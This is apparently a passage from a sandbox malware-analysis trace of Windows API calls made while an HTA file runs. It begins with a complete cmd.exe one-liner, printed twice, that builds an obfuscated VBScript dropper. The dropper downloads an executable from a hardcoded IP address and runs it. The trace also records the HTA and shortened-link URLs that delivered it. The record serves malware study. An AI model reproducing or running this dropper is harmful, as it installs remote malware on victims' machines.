@echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs ", varVal2=0x0), [4]=0x2e592c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33f224, puArgErr=0x33f268 | out: pDispParams=0x33f248*(rgvarg=([0]=0x2e59280*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x2e59290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [2]=0x2e592a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x2e592b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs ", varVal2=0x0), [4]=0x2e592c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33f224*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f268*=0x36ea670) returned 0x0
[0077.003] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0077.003] SetTimer (hWnd=0x1021e, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0077.003] GetCurrentThreadId () returned 0xbf4
[0077.107] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0077.107] KillTimer (hWnd=0x1021e, uIDEvent=0x1008) returned 1
[0077.107] GetCurrentThreadId () returned 0xbf4
[0077.447] Shell:IUnknown:Release (This=0x36ea670) returned 0x1
[0077.448] GetCurrentThreadId () returned 0xbf4
[0077.448] _wcsicmp (_String1="window", _String2="window") returned 0
[0077.448] GetCurrentThreadId () returned 0xbf4
[0077.448] GetCurrentThreadId () returned 0xbf4
[0077.448] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0077.448] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0077.449] GetCurrentThreadId () returned 0xbf4
[0077.449] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0077.449] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0077.449] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0077.450] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0077.467] ISystemDebugEventFire:IsActive (This=0x36fd610) returned 0x1
[0077.467] GetCurrentThreadId () returned 0xbf4
[0077.467] GetCurrentThreadId () returned 0xbf4
[0077.467] GetCurrentThreadId () returned 0xbf4
[0077.534] GetSystemDefaultLCID () returned 0x409
[0077.534] GetVersionExW (in: lpVersionInformation=0x33f4c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x200067, dwMinorVersion=0x6f0066, dwBuildNumber=0x200072, dwPlatformId=0x740068, szCSDVersion="tp://82.118.242.107/~able/1_ga/al/AXVHa.hta...") | out: lpVersionInformation=0x33f4c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0077.534] GetKeyboardLayoutList (in: nBuff=32, lpList=0x33f448 | out: lpList=0x33f448) returned 1
[0077.534] GetSystemMetrics (nIndex=4096) returned 0
[0077.534] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0c9
[0077.534] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ad
[0077.534] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b0
[0077.534] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c4
[0077.534] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c5
[0077.534] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c3
[0077.534] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc073
[0077.534] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0cd
[0077.535] IUnknown:Release (This=0x911444) returned 0xf
[0077.535] IUnknown:Release (This=0x857c00) returned 0x3
[0077.535] IUnknown:Release (This=0x911444) returned 0xe
[0077.535] IUnknown:Release (This=0x911444) returned 0xd
[0077.535] IUnknown:Release (This=0x857c00) returned 0x2
[0077.535] IUnknown:Release (This=0x911444) returned 0xc
[0077.536] IUnknown:Release (This=0x84c3fc) returned 0xb
[0077.536] IUnknown:Release (This=0x84c3fc) returned 0xa
[0077.536] IUnknown:Release (This=0x911444) returned 0xb
[0077.536] IUnknown:Release (This=0x911444) returned 0xa
[0077.536] IUnknown:Release (This=0x870040) returned 0x1
[0077.536] IUnknown:Release (This=0x870040) returned 0x0
[0077.536] IUnknown:Release (This=0x911444) returned 0x9
[0077.537] IUnknown:Release (This=0x911444) returned 0x8
[0077.537] IUnknown:Release (This=0x84c3fc) returned 0x7
[0077.537] IUnknown:Release (This=0x84c3fc) returned 0x6
[0077.539] LsGetRubyLsimethods () returned 0x0
[0077.539] LsGetTatenakayokoLsimethods () returned 0x0
[0077.539] LsGetHihLsimethods () returned 0x0
[0077.539] LsGetWarichuLsimethods () returned 0x0
[0077.539] LsGetReverseLsimethods () returned 0x0
[0077.539] LsCreateContext () returned 0x0
[0077.541] LsSetModWidthPairs () returned 0x0
[0077.544] LsSetBreaking () returned 0x0
[0077.544] LsSetDoc () returned 0x0
[0077.545] LsCreateLine () returned 0x0
[0077.545] EnumFontsW (hdc=0x28010919, lpLogfont="Times New Roman", lpProc=0x748e0b47, lParam=0x33e85c) returned 1
[0077.545] CreateFontIndirectW (lplf=0x33e7f8) returned 0x10a0923
[0077.546] GetOutlineTextMetricsW (in: hdc=0x28010919, cjCopy=0xd8, potm=0x33e660 | out: potm=0x33e660) returned 0xd8
[0077.547] SelectObject (hdc=0x28010919, h=0x18a002e) returned 0x10a0923
[0077.547] SelectObject (hdc=0x28010919, h=0x10a0923) returned 0x18a002e
[0077.547] GetTextFaceW (in: hdc=0x28010919, c=32, lpName=0x33e8b0 | out: lpName="Times New Roman") returned 16
[0077.547] SelectObject (hdc=0x28010919, h=0x18a002e) returned 0x10a0923
[0077.547] SelectObject (hdc=0x28010919, h=0x10a0923) returned 0x18a002e
[0077.547] GetTextCharsetInfo (in: hdc=0x28010919, lpSig=0x33e818, dwFlags=0x0 | out: lpSig=0x33e818) returned 0
[0077.547] SelectObject (hdc=0x28010919, h=0x18a002e) returned 0x10a0923
[0077.547] GetFontUnicodeRanges (in: hdc=0x28010919, lpgs=0x0 | out: lpgs=0x0) returned 0x27c
[0077.547] GetFontUnicodeRanges (in: hdc=0x28010919, lpgs=0x3709f10 | out: lpgs=0x3709f10) returned 0x27c
[0077.547] SelectObject (hdc=0x28010919, h=0x18a002e) returned 0x10a0923
[0077.547] GetCharWidth32W (in: hdc=0x28010919, iFirst=0x20, iLast=0x7e, lpBuffer=0x33e7f0 | out: lpBuffer=0x33e7f0) returned 1
[0077.550] LsQueryLineDup () returned 0x0
[0077.550] LsDestroyLine () returned 0x0
[0077.550] GetCurrentThreadId () returned 0xbf4
[0077.550] GetCurrentThreadId () returned 0xbf4
[0077.550] GetCurrentThreadId () returned 0xbf4
[0077.550] GetFocus () returned 0x1021e
[0077.550] GetCursorPos (in: lpPoint=0x33f500 | out: lpPoint=0x33f500*(x=220, y=696)) returned 1
[0077.550] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f500 | out: lpPoint=0x33f500) returned 1
[0077.551] GetKeyState (nVirtKey=16) returned 0
[0077.551] GetKeyState (nVirtKey=17) returned 0
[0077.551] GetKeyState (nVirtKey=18) returned 0
[0077.551] GetKeyState (nVirtKey=160) returned 0
[0077.551] GetKeyState (nVirtKey=162) returned 0
[0077.551] GetKeyState (nVirtKey=164) returned 0
[0077.551] GetCurrentThreadId () returned 0xbf4
[0077.551] GetCurrentThreadId () returned 0xbf4
[0077.551] GetCurrentThreadId () returned 0xbf4
[0077.551] GetCurrentThreadId () returned 0xbf4
[0077.551] GetCurrentThreadId () returned 0xbf4
[0077.551] GetCurrentThreadId () returned 0xbf4
[0077.551] GetCursorPos (in: lpPoint=0x33f500 | out: lpPoint=0x33f500*(x=220, y=696)) returned 1
[0077.551] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f500 | out: lpPoint=0x33f500) returned 1
[0077.551] GetKeyState (nVirtKey=16) returned 0
[0077.551] GetKeyState (nVirtKey=17) returned 0
[0077.551] GetKeyState (nVirtKey=18) returned 0
[0077.551] GetKeyState (nVirtKey=160) returned 0
[0077.551] GetKeyState (nVirtKey=162) returned 0
[0077.551] GetKeyState (nVirtKey=164) returned 0
[0077.551] GetCapture () returned 0x0
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCursorPos (in: lpPoint=0x33f500 | out: lpPoint=0x33f500*(x=220, y=696)) returned 1
[0077.552] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f500 | out: lpPoint=0x33f500) returned 1
[0077.552] GetKeyState (nVirtKey=16) returned 0
[0077.552] GetKeyState (nVirtKey=17) returned 0
[0077.552] GetKeyState (nVirtKey=18) returned 0
[0077.552] GetKeyState (nVirtKey=160) returned 0
[0077.552] GetKeyState (nVirtKey=162) returned 0
[0077.552] GetKeyState (nVirtKey=164) returned 0
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.552] GetCurrentThreadId () returned 0xbf4
[0077.553] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x33f850 | out: ppu=0x33f850) returned 0x0
[0077.553] IUnknown:AddRef (This=0x911444) returned 0x9
[0077.553] IUri:GetAbsoluteUri (in: This=0x911444, pbstrAbsoluteUri=0x33f8d0 | out: pbstrAbsoluteUri=0x33f8d0*="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0077.553] IUnknown:Release (This=0x911444) returned 0x8
[0077.553] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76720000
[0077.554] GetProcAddress (hModule=0x76720000, lpProcName="VariantClear") returned 0x76723eae
[0077.554] ShouldShowIntranetWarningSecband () returned 0x0
[0077.555] GetIUriPriv () returned 0x0
[0077.555] IUnknown:Release (This=0x911444) returned 0x8
[0077.555] GetCursorPos (in: lpPoint=0x33f6c8 | out: lpPoint=0x33f6c8*(x=220, y=696)) returned 1
[0077.555] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f6c8 | out: lpPoint=0x33f6c8) returned 1
[0077.555] GetKeyState (nVirtKey=16) returned 0
[0077.555] GetKeyState (nVirtKey=17) returned 0
[0077.555] GetKeyState (nVirtKey=18) returned 0
[0077.555] GetKeyState (nVirtKey=160) returned 0
[0077.555] GetKeyState (nVirtKey=162) returned 0
[0077.555] GetKeyState (nVirtKey=164) returned 0
[0077.555] GetCurrentThreadId () returned 0xbf4
[0077.556] GetCurrentThreadId () returned 0xbf4
[0077.556] GetCurrentThreadId () returned 0xbf4
[0077.556] GetFocus () returned 0x1021e
[0077.556] GetCursorPos (in: lpPoint=0x33f838 | out: lpPoint=0x33f838*(x=220, y=696)) returned 1
[0077.556] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f838 | out: lpPoint=0x33f838) returned 1
[0077.556] GetClientRect (in: hWnd=0x1021e, lpRect=0x33f828 | out: lpRect=0x33f828) returned 1
[0077.556] PostMessageW (hWnd=0x1021e, Msg=0x20, wParam=0x21e, lParam=0x1) returned 1
[0077.556] LoadStringW (in: hInstance=0x73870000, uID=0x1fe9, lpBuffer=0x33f4c0, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4
[0077.556] IUnknown:AddRef (This=0x911444) returned 0x9
[0077.556] IUri:GetScheme (in: This=0x911444, pdwScheme=0x33e94c | out: pdwScheme=0x33e94c*=0x2) returned 0x0
[0077.556] IUri:GetDisplayUri (in: This=0x911444, pbstrDisplayString=0x33e958 | out: pbstrDisplayString=0x33e958*="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0077.556] GetWindowTextW (in: hWnd=0x1021a, lpString=0x33e4f8, nMaxCount=512 | out: lpString="https://urlz.fr/8gYe") returned 20
[0077.556] NtdllDefWindowProc_W () returned 0x14
[0077.556] SetWindowTextW (hWnd=0x1021a, lpString="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 1
[0077.556] NtdllDefWindowProc_W () returned 0x1
[0077.584] IUnknown:Release (This=0x911444) returned 0x8
[0077.584] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0077.584] SendMessageW (hWnd=0x10216, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0077.584] NtdllDefWindowProc_W () returned 0x0
[0077.585] NtdllDefWindowProc_W () returned 0x0
[0077.586] NtdllDefWindowProc_W () returned 0x0
[0077.586] SendMessageW (hWnd=0x1021a, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0
[0077.586] NtdllDefWindowProc_W () returned 0x0
[0077.586] SetWindowLongW (hWnd=0x1021a, nIndex=-16, dwNewLong=-2100363264) returned -2033254400
[0077.586] NtdllDefWindowProc_W () returned 0x0
[0077.586] NtdllDefWindowProc_W () returned 0x0
[0077.602] NtdllDefWindowProc_W () returned 0x10027
[0077.602] SetWindowLongW (hWnd=0x1021a, nIndex=-20, dwNewLong=262144) returned 262400
[0077.602] NtdllDefWindowProc_W () returned 0x0
[0077.603] NtdllDefWindowProc_W () returned 0x0
[0077.603] SetWindowPos (hWnd=0x1021a, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0077.603] NtdllDefWindowProc_W () returned 0x0
[0077.603] NtdllDefWindowProc_W () returned 0x0
[0077.605] NtdllDefWindowProc_W () returned 0x0
[0077.605] GlobalAddAtomW (lpString=0x0) returned 0x0
[0077.605] SetPropW (hWnd=0x10216, lpString=0x0, hData=0x10216) returned 0
[0077.605] ShowWindow (hWnd=0x1021a, nCmdShow=0) returned 0
[0077.605] UpdateWindow (hWnd=0x1021a) returned 1
[0077.605] GetCurrentThreadId () returned 0xbf4
[0077.606] GetCurrentThreadId () returned 0xbf4
[0077.606] GetCurrentThreadId () returned 0xbf4
[0077.606] GetCurrentThreadId () returned 0xbf4
[0077.606] GetCurrentThreadId () returned 0xbf4
[0077.607] GetCursorPos (in: lpPoint=0x33f248 | out: lpPoint=0x33f248*(x=220, y=696)) returned 1
[0077.607] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f248 | out: lpPoint=0x33f248) returned 1
[0077.607] GetKeyState (nVirtKey=16) returned 0
[0077.607] GetKeyState (nVirtKey=17) returned 0
[0077.607] GetKeyState (nVirtKey=18) returned 0
[0077.607] GetKeyState (nVirtKey=160) returned 0
[0077.607] GetKeyState (nVirtKey=162) returned 0
[0077.607] GetKeyState (nVirtKey=164) returned 0
[0077.609] GetCurrentThreadId () returned 0xbf4
[0077.609] GetCurrentThreadId () returned 0xbf4
[0077.609] IsWinEventHookInstalled (event=0x8005) returned 0
[0077.609] StrCmpICW (pszStr1="about:blank", pszStr2="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned -7
[0077.609] StrCmpICW (pszStr1="about:blank", pszStr2="https://urlz.fr/8gYe") returned -7
[0077.609] GetCurrentThreadId () returned 0xbf4
[0077.609] GetCurrentThreadId () returned 0xbf4
[0077.609] GetCurrentThreadId () returned 0xbf4
[0077.609] GetCurrentThreadId () returned 0xbf4
[0077.610] GetCurrentThreadId () returned 0xbf4
[0077.610] GetCurrentThreadId () returned 0xbf4
[0077.610] GetCurrentThreadId () returned 0xbf4
[0077.610] GetFocus () returned 0x1021e
[0077.610] GetCurrentThreadId () returned 0xbf4
[0077.610] GetCursorPos (in: lpPoint=0x33f728 | out: lpPoint=0x33f728*(x=220, y=696)) returned 1
[0077.610] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f728 | out: lpPoint=0x33f728) returned 1
[0077.610] GetKeyState (nVirtKey=16) returned 0
[0077.610] GetKeyState (nVirtKey=17) returned 0
[0077.610] GetKeyState (nVirtKey=18) returned 0
[0077.610] GetKeyState (nVirtKey=160) returned 0
[0077.610] GetKeyState (nVirtKey=162) returned 0
[0077.610] GetKeyState (nVirtKey=164) returned 0
[0077.611] GetCurrentThreadId () returned 0xbf4
[0077.611] GetCurrentThreadId () returned 0xbf4
[0077.611] IsWinEventHookInstalled (event=0x8005) returned 0
[0077.611] GetCurrentThreadId () returned 0xbf4
[0077.611] GetMessageW (in: lpMsg=0x33fa5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33fa5c) returned 1
[0077.611] TranslateMessage (lpMsg=0x33fa5c) returned 0
[0077.611] DispatchMessageW (lpMsg=0x33fa5c) returned 0x0
[0077.611] GetCursorPos (in: lpPoint=0x33f358 | out: lpPoint=0x33f358*(x=220, y=696)) returned 1
[0077.611] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f358 | out: lpPoint=0x33f358) returned 1
[0077.611] GetKeyState (nVirtKey=16) returned 0
[0077.611] GetKeyState (nVirtKey=17) returned 0
[0077.611] GetKeyState (nVirtKey=18) returned 0
[0077.611] GetKeyState (nVirtKey=160) returned 0
[0077.611] GetKeyState (nVirtKey=162) returned 0
[0077.611] GetKeyState (nVirtKey=164) returned 0
[0077.612] GetCursorPos (in: lpPoint=0x33f1e8 | out: lpPoint=0x33f1e8*(x=220, y=696)) returned 1
[0077.612] ScreenToClient (in: hWnd=0x1021e, lpPoint=0x33f1e8 | out: lpPoint=0x33f1e8) returned 1
[0077.612] GetKeyState (nVirtKey=16) returned 0
[0077.612] GetKeyState (nVirtKey=17) returned 0
[0077.612] GetKeyState (nVirtKey=18) returned 0
[0077.612] GetKeyState (nVirtKey=160) returned 0
[0077.612] GetKeyState (nVirtKey=162) returned 0
[0077.612] GetKeyState (nVirtKey=164) returned 0
[0077.612] GetCurrentThreadId () returned 0xbf4
[0077.612] GetCurrentThreadId () returned 0xbf4
[0077.612] GetCurrentThreadId () returned 0xbf4
[0077.612] DestroyWindow (hWnd=0x1021a) returned 1
[0077.612] NtdllDefWindowProc_W () returned 0x0
[0077.613] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0077.613] GetKeyState (nVirtKey=1) returned 1
[0077.613] GetKeyState (nVirtKey=2) returned 0
[0077.613] GetKeyState (nVirtKey=16) returned 0
[0077.613] GetKeyState (nVirtKey=17) returned 0
[0077.613] GetKeyState (nVirtKey=4) returned 0
[0077.613] GetKeyState (nVirtKey=18) returned 0
[0077.613] GetMessageTime () returned 136563
[0077.613] GetMessagePos () returned 0x2b800dc
[0077.613] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x33f1fc | out: plResult=0x33f1fc) returned 0x0
[0077.614] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0077.614] GetKeyState (nVirtKey=1) returned 1
[0077.614] GetKeyState (nVirtKey=2) returned 0
[0077.614] GetKeyState (nVirtKey=16) returned 0
[0077.614] GetKeyState (nVirtKey=17) returned 0
[0077.614] GetKeyState (nVirtKey=4) returned 0
[0077.614] GetKeyState (nVirtKey=18) returned 0
[0077.614] GetMessageTime () returned 136563
[0077.614] GetMessagePos () returned 0x2b800dc
[0077.616] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x33ec2c | out: plResult=0x33ec2c) returned 0x0
[0077.616] SetTimer (hWnd=0x1021e, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0077.616] GetCurrentThreadId () returned 0xbf4
[0077.616] GetCurrentThreadId () returned 0xbf4
[0077.616] PostQuitMessage (nExitCode=0)
[0077.616] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0077.616] RevokeDragDrop (hwnd=0x1021e) returned 0x0
[0077.616] GetCurrentThreadId () returned 0xbf4
[0077.617] GetWindowLongW (hWnd=0x1021e, nIndex=-21) returned 8736600
[0077.617] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x88b118, hWnd=0x1021e, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x33f770 | out: plResult=0x33f770) returned 0x1
[0077.617] NtdllDefWindowProc_W () returned 0x0
[0077.617] GetCurrentThreadId () returned 0xbf4
[0077.617] SetWindowLongW (hWnd=0x1021e, nIndex=-21, dwNewLong=0) returned 8736600
[0077.617] NtdllDefWindowProc_W () returned 0x0
[0077.617] GetMessageW (in: lpMsg=0x33fa5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33fa5c) returned 0
[0077.618] GetCursorPos (in: lpPoint=0x33f7f0 | out: lpPoint=0x33f7f0*(x=220, y=696)) returned 1
[0077.618] ScreenToClient (in: hWnd=0x0, lpPoint=0x33f7f0 | out: lpPoint=0x33f7f0) returned 0
[0077.618] GetKeyState (nVirtKey=16) returned 0
[0077.618] GetKeyState (nVirtKey=17) returned 0
[0077.618] GetKeyState (nVirtKey=18) returned 0
[0077.618] GetKeyState (nVirtKey=160) returned 0
[0077.618] GetKeyState (nVirtKey=162) returned 0
[0077.618] GetKeyState (nVirtKey=164) returned 0
[0077.618] GetCurrentThreadId () returned 0xbf4
[0077.618] GetCurrentThreadId () returned 0xbf4
[0077.618] IsWinEventHookInstalled (event=0x8005) returned 0
[0077.618] GetCurrentThreadId () returned 0xbf4
[0077.618] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x88b118) returned 0x0
[0077.619] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f97c | out: phkResult=0x33f97c*=0x6e0) returned 0x0
[0077.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f980 | out: phkResult=0x33f980*=0x66c) returned 0x0
[0077.619] RegOpenKeyExW (in: hKey=0x66c, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x33f93c | out: phkResult=0x33f93c*=0x0) returned 0x2
